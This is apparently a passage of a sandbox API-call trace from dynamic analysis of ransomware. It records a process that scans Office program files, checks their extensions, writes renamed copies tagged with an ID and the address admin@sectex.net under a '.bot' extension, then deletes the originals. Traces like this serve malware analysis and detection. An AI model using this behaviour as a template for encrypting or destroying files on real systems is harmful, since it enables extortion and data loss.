	[0156.864] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.865] lstrlenW (lpString=".1cd") returned 4
	[0156.865] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.865] lstrlenW (lpString=".jpg") returned 4
	[0156.865] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.865] lstrlenW (lpString=".doc") returned 4
	[0156.865] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.865] lstrlenW (lpString=".docx") returned 5
	[0156.865] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1
	[0156.865] lstrlenW (lpString=".pdf") returned 4
	[0156.865] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.865] lstrlenW (lpString=".xls") returned 4
	[0156.865] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.865] lstrlenW (lpString=".xlsx") returned 5
	[0156.865] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1
	[0156.865] lstrlenW (lpString=".ppt") returned 4
	[0156.865] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.865] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.865] lstrlenW (lpString=".zip") returned 4
	[0156.865] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.865] lstrlenW (lpString=".rar") returned 4
	[0156.865] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.866] lstrlenW (lpString=".bz2") returned 4
	[0156.866] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.866] lstrlenW (lpString=".7z") returned 3
	[0156.866] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.866] lstrlenW (lpString=".dbf") returned 4
	[0156.866] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.866] lstrlenW (lpString=".1cd") returned 4
	[0156.866] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.866] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CODEEDIT.DLL") returned 55
	[0156.866] lstrlenW (lpString=".jpg") returned 4
	[0156.866] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.866] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0156.866] lstrlenW (lpString="CONTAB32.DLL") returned 12
	[0156.866] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\contab32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.867] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=183160) returned 1
	[0156.867] CloseHandle (hObject=0x388) returned 1
	[0156.867] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\contab32.dll")) returned 0x20
	[0156.867] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\contab32.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\contab32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0156.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.867] lstrlenW (lpString=".doc") returned 4
	[0156.867] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.867] lstrlenW (lpString=".docx") returned 5
	[0156.867] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1
	[0156.867] lstrlenW (lpString=".pdf") returned 4
	[0156.867] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.867] lstrlenW (lpString=".xls") returned 4
	[0156.867] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.867] lstrlenW (lpString=".xlsx") returned 5
	[0156.867] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1
	[0156.868] lstrlenW (lpString=".ppt") returned 4
	[0156.868] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.868] lstrlenW (lpString=".zip") returned 4
	[0156.868] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.868] lstrlenW (lpString=".rar") returned 4
	[0156.868] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.868] lstrlenW (lpString=".bz2") returned 4
	[0156.868] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.868] lstrlenW (lpString=".7z") returned 3
	[0156.868] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.868] lstrlenW (lpString=".dbf") returned 4
	[0156.868] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.868] lstrlenW (lpString=".1cd") returned 4
	[0156.868] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.868] lstrlenW (lpString=".jpg") returned 4
	[0156.868] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.868] lstrlenW (lpString=".doc") returned 4
	[0156.868] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0156.868] lstrlenW (lpString=".docx") returned 5
	[0156.868] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1
	[0156.868] lstrlenW (lpString=".pdf") returned 4
	[0156.868] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0156.868] lstrlenW (lpString=".xls") returned 4
	[0156.868] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0156.869] lstrlenW (lpString=".xlsx") returned 5
	[0156.869] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1
	[0156.869] lstrlenW (lpString=".ppt") returned 4
	[0156.869] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0156.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.869] lstrlenW (lpString=".zip") returned 4
	[0156.869] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0156.869] lstrlenW (lpString=".rar") returned 4
	[0156.869] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0156.869] lstrlenW (lpString=".bz2") returned 4
	[0156.869] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0156.869] lstrlenW (lpString=".7z") returned 3
	[0156.869] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0156.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.869] lstrlenW (lpString=".dbf") returned 4
	[0156.869] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0156.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.869] lstrlenW (lpString=".1cd") returned 4
	[0156.869] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0156.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONTAB32.DLL") returned 55
	[0156.869] lstrlenW (lpString=".jpg") returned 4
	[0156.869] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0156.869] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0156.869] lstrlenW (lpString="ContactPicker.dll") returned 17
	[0156.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll" (normalized: "c:\\program files\\microsoft office\\office14\\contactpicker.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.873] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=222592) returned 1
	[0156.873] CloseHandle (hObject=0x388) returned 1
	[0156.873] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll" (normalized: "c:\\program files\\microsoft office\\office14\\contactpicker.dll")) returned 0x20
	[0156.998] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\contactpicker.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll" (normalized: "c:\\program files\\microsoft office\\office14\\contactpicker.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0157.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.552] lstrlenW (lpString=".doc") returned 4
	[0157.552] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0157.552] lstrlenW (lpString=".docx") returned 5
	[0157.552] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1
	[0157.552] lstrlenW (lpString=".pdf") returned 4
	[0157.552] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0157.552] lstrlenW (lpString=".xls") returned 4
	[0157.552] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0157.552] lstrlenW (lpString=".xlsx") returned 5
	[0157.552] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1
	[0157.552] lstrlenW (lpString=".ppt") returned 4
	[0157.552] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0157.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.553] lstrlenW (lpString=".zip") returned 4
	[0157.553] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0157.553] lstrlenW (lpString=".rar") returned 4
	[0157.553] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0157.553] lstrlenW (lpString=".bz2") returned 4
	[0157.553] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0157.553] lstrlenW (lpString=".7z") returned 3
	[0157.553] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0157.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.553] lstrlenW (lpString=".dbf") returned 4
	[0157.553] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0157.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.553] lstrlenW (lpString=".1cd") returned 4
	[0157.553] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0157.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.553] lstrlenW (lpString=".jpg") returned 4
	[0157.553] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0157.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.553] lstrlenW (lpString=".doc") returned 4
	[0157.553] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0157.553] lstrlenW (lpString=".docx") returned 5
	[0157.553] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1
	[0157.553] lstrlenW (lpString=".pdf") returned 4
	[0157.553] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0157.553] lstrlenW (lpString=".xls") returned 4
	[0157.553] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0157.553] lstrlenW (lpString=".xlsx") returned 5
	[0157.553] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1
	[0157.553] lstrlenW (lpString=".ppt") returned 4
	[0157.554] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0157.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.554] lstrlenW (lpString=".zip") returned 4
	[0157.554] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0157.554] lstrlenW (lpString=".rar") returned 4
	[0157.554] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0157.554] lstrlenW (lpString=".bz2") returned 4
	[0157.554] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0157.554] lstrlenW (lpString=".7z") returned 3
	[0157.554] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0157.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.554] lstrlenW (lpString=".dbf") returned 4
	[0157.554] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0157.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.554] lstrlenW (lpString=".1cd") returned 4
	[0157.554] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0157.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 60
	[0157.554] lstrlenW (lpString=".jpg") returned 4
	[0157.554] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0157.554] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0157.554] lstrlenW (lpString="LOCALDV.DLL") returned 11
	[0157.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\localdv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0157.555] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=37248) returned 1
	[0157.555] CloseHandle (hObject=0x3f0) returned 1
	[0157.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\localdv.dll")) returned 0x20
	[0157.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\localdv.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\localdv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0157.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.556] lstrlenW (lpString=".doc") returned 4
	[0157.556] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0157.556] lstrlenW (lpString=".docx") returned 5
	[0157.556] lstrcmpiW (lpString1=".docx", lpString2="V.DLL") returned -1
	[0157.556] lstrlenW (lpString=".pdf") returned 4
	[0157.556] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0157.556] lstrlenW (lpString=".xls") returned 4
	[0157.556] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0157.556] lstrlenW (lpString=".xlsx") returned 5
	[0157.556] lstrcmpiW (lpString1=".xlsx", lpString2="V.DLL") returned -1
	[0157.556] lstrlenW (lpString=".ppt") returned 4
	[0157.556] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0157.556] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.556] lstrlenW (lpString=".zip") returned 4
	[0157.556] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0157.556] lstrlenW (lpString=".rar") returned 4
	[0157.556] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0157.556] lstrlenW (lpString=".bz2") returned 4
	[0157.556] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0157.556] lstrlenW (lpString=".7z") returned 3
	[0157.556] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0157.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.557] lstrlenW (lpString=".dbf") returned 4
	[0157.557] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0157.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.557] lstrlenW (lpString=".1cd") returned 4
	[0157.557] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0157.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.557] lstrlenW (lpString=".jpg") returned 4
	[0157.557] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0157.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.557] lstrlenW (lpString=".doc") returned 4
	[0157.557] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0157.557] lstrlenW (lpString=".docx") returned 5
	[0157.557] lstrcmpiW (lpString1=".docx", lpString2="V.DLL") returned -1
	[0157.557] lstrlenW (lpString=".pdf") returned 4
	[0157.557] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0157.557] lstrlenW (lpString=".xls") returned 4
	[0157.557] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0157.557] lstrlenW (lpString=".xlsx") returned 5
	[0157.557] lstrcmpiW (lpString1=".xlsx", lpString2="V.DLL") returned -1
	[0157.557] lstrlenW (lpString=".ppt") returned 4
	[0157.557] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0157.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.557] lstrlenW (lpString=".zip") returned 4
	[0157.557] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0157.557] lstrlenW (lpString=".rar") returned 4
	[0157.557] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0157.557] lstrlenW (lpString=".bz2") returned 4
	[0157.557] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0157.557] lstrlenW (lpString=".7z") returned 3
	[0157.558] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0157.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.558] lstrlenW (lpString=".dbf") returned 4
	[0157.558] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0157.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.558] lstrlenW (lpString=".1cd") returned 4
	[0157.558] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0157.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\LOCALDV.DLL") returned 67
	[0157.558] lstrlenW (lpString=".jpg") returned 4
	[0157.558] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0157.558] lstrcmpiW (lpString1=".SAM", lpString2=".bot") returned 1
	[0157.558] lstrlenW (lpString="ODBCR.SAM") returned 9
	[0157.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\odbcr.sam"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0157.848] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=11664) returned 1
	[0157.848] CloseHandle (hObject=0x268) returned 1
	[0157.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\odbcr.sam")) returned 0x20
	[0158.305] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\odbcr.sam.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\odbcr.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0158.382] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.382] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\odbcr.sam.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0158.382] GetLastError () returned 0x0
	[0158.382] ReadFile (in: hFile=0x398, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x2d90, lpOverlapped=0x0) returned 1
	[0158.533] WriteFile (in: hFile=0x3b8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x2da0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x2da0, lpOverlapped=0x0) returned 1
	[0158.534] ReadFile (in: hFile=0x398, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.534] WriteFile (in: hFile=0x3b8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0158.534] SetEndOfFile (hFile=0x3b8) returned 1
	[0158.534] CloseHandle (hObject=0x3b8) returned 1
	[0158.534] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.535] SetEndOfFile (hFile=0x398) returned 1
	[0158.536] CloseHandle (hObject=0x398) returned 1
	[0158.537] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.589] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\odbcr.sam")) returned 1
	[0158.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.590] lstrlenW (lpString=".doc") returned 4
	[0158.590] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.590] lstrlenW (lpString=".docx") returned 5
	[0158.590] lstrcmpiW (lpString1=".docx", lpString2="R.SAM") returned -1
	[0158.590] lstrlenW (lpString=".pdf") returned 4
	[0158.590] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.590] lstrlenW (lpString=".xls") returned 4
	[0158.590] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.590] lstrlenW (lpString=".xlsx") returned 5
	[0158.590] lstrcmpiW (lpString1=".xlsx", lpString2="R.SAM") returned -1
	[0158.590] lstrlenW (lpString=".ppt") returned 4
	[0158.590] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.590] lstrlenW (lpString=".zip") returned 4
	[0158.590] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.590] lstrlenW (lpString=".rar") returned 4
	[0158.590] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.590] lstrlenW (lpString=".bz2") returned 4
	[0158.591] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.591] lstrlenW (lpString=".7z") returned 3
	[0158.591] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.591] lstrlenW (lpString=".dbf") returned 4
	[0158.591] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\ODBCR.SAM") returned 65
	[0158.591] lstrlenW (lpString=".1cd") returned 4
	[0158.591] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
